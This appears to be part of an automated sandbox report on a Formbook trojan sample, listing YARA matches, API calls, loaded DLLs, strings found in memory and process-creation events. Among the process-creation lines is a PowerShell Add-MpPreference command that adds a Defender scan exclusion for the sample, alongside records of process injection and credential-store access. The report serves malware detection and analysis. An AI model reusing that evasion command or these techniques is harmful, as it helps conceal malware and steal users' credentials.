            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3795206841.0000000005411000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.cr-pos.com/o1v8/
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033yu1SPS
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SecEdit.exe, 0000000C.00000003.1778792851.0000000007907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=goodgiftguru.com
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain

            E-Banking Fraud

            Source: Yara match File source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0042B143 NtClose,4_2_0042B143
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036635C0 NtCreateMutant,LdrInitializeThunk,4_2_036635C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662B60 NtClose,LdrInitializeThunk,4_2_03662B60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03662DF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03662C70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03664340 NtSetContextThread,4_2_03664340
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663010 NtOpenDirectoryObject,4_2_03663010
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663090 NtSetValueKey,4_2_03663090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03664650 NtSuspendThread,4_2_03664650
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BE0 NtQueryValueKey,4_2_03662BE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BF0 NtAllocateVirtualMemory,4_2_03662BF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BA0 NtEnumerateValueKey,4_2_03662BA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662B80 NtQueryInformationFile,4_2_03662B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AF0 NtWriteFile,4_2_03662AF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AD0 NtReadFile,4_2_03662AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AB0 NtWaitForSingleObject,4_2_03662AB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036639B0 NtGetContextThread,4_2_036639B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F60 NtCreateProcessEx,4_2_03662F60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F30 NtCreateSection,4_2_03662F30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FE0 NtCreateFile,4_2_03662FE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FA0 NtQuerySection,4_2_03662FA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FB0 NtResumeThread,4_2_03662FB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F90 NtProtectVirtualMemory,4_2_03662F90
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662E30 NtWriteVirtualMemory,4_2_03662E30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662EE0 NtQueueApcThread,4_2_03662EE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662EA0 NtAdjustPrivilegesToken,4_2_03662EA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662E80 NtReadVirtualMemory,4_2_03662E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663D70 NtOpenThread,4_2_03663D70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D30 NtUnmapViewOfSection,4_2_03662D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D00 NtSetInformationFile,4_2_03662D00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D10 NtMapViewOfSection,4_2_03662D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663D10 NtOpenProcessToken,4_2_03663D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DD0 NtDelayExecution,4_2_03662DD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DB0 NtEnumerateKey,4_2_03662DB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C60 NtCreateKey,4_2_03662C60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C00 NtQueryInformationProcess,4_2_03662C00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CF0 NtOpenProcess,4_2_03662CF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CC0 NtQueryVirtualMemory,4_2_03662CC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CA0 NtQueryInformationToken,4_2_03662CA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03014340 NtSetContextThread,LdrInitializeThunk,12_2_03014340
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013090 NtSetValueKey,LdrInitializeThunk,12_2_03013090
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03014650 NtSuspendThread,LdrInitializeThunk,12_2_03014650
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030135C0 NtCreateMutant,LdrInitializeThunk,12_2_030135C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012B60 NtClose,LdrInitializeThunk,12_2_03012B60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03012BA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03012BE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03012BF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AD0 NtReadFile,LdrInitializeThunk,12_2_03012AD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AF0 NtWriteFile,LdrInitializeThunk,12_2_03012AF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030139B0 NtGetContextThread,LdrInitializeThunk,12_2_030139B0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F30 NtCreateSection,LdrInitializeThunk,12_2_03012F30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FB0 NtResumeThread,LdrInitializeThunk,12_2_03012FB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FE0 NtCreateFile,LdrInitializeThunk,12_2_03012FE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03012E80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03012EE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03012D10
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03012D30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DD0 NtDelayExecution,LdrInitializeThunk,12_2_03012DD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03012DF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C60 NtCreateKey,LdrInitializeThunk,12_2_03012C60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03012C70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03012CA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013010 NtOpenDirectoryObject,12_2_03013010
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012B80 NtQueryInformationFile,12_2_03012B80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AB0 NtWaitForSingleObject,12_2_03012AB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F60 NtCreateProcessEx,12_2_03012F60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F90 NtProtectVirtualMemory,12_2_03012F90
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FA0 NtQuerySection,12_2_03012FA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012E30 NtWriteVirtualMemory,12_2_03012E30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012EA0 NtAdjustPrivilegesToken,12_2_03012EA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D00 NtSetInformationFile,12_2_03012D00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013D10 NtOpenProcessToken,12_2_03013D10
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013D70 NtOpenThread,12_2_03013D70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DB0 NtEnumerateKey,12_2_03012DB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C00 NtQueryInformationProcess,12_2_03012C00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CC0 NtQueryVirtualMemory,12_2_03012CC0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CF0 NtOpenProcess,12_2_03012CF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597B70 NtCreateFile,12_2_00597B70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597CD0 NtReadFile,12_2_00597CD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597DC0 NtDeleteFile,12_2_00597DC0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597E60 NtClose,12_2_00597E60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597FB0 NtAllocateVirtualMemory,12_2_00597FB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFCC94 NtReadVirtualMemory,12_2_02DFCC94
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFD20F NtMapViewOfSection,12_2_02DFD20F
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02FCB970 appears 269 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 0304EA12 appears 84 times
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static PE information: No import functions for PE file found
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000000.1336075939.0000023E06587000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameArkhangelsk.exe4 vs z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Binary or memory string: OriginalFilenameArkhangelsk.exe4 vs z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Sources matching this rule:
            Source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@17/11@17/10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
            Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7448
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4m11nsi.hvv.ps1
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007944000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3791538876.0000000002BE4000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3791538876.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | ReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | File read: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
            Source: unknown | Process created: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe | Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
            Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Windows\SysWOW64\SecEdit.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
            Source: C:\Windows\SysWOW64\SecEdit.exe | Section loaded: scecli.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe | Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll, cryptdlg.dll, msoert2.dll, msimg32.dll, wininet.dll, sspicli.dll, cryptui.dll, msasn1.dll, msftedit.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll, propsys.dll, edputil.dll, apphelp.dll, explorerframe.dll, sxs.dll, actxprxy.dll, wintypes.dll, windows.staterepositoryps.dll, iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll, cryptdlg.dll, msoert2.dll, msimg32.dll, wininet.dll, sspicli.dll, cryptui.dll, msasn1.dll, msftedit.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll, propsys.dll, edputil.dll, apphelp.dll, explorerframe.dll, sxs.dll, iertutil.dll
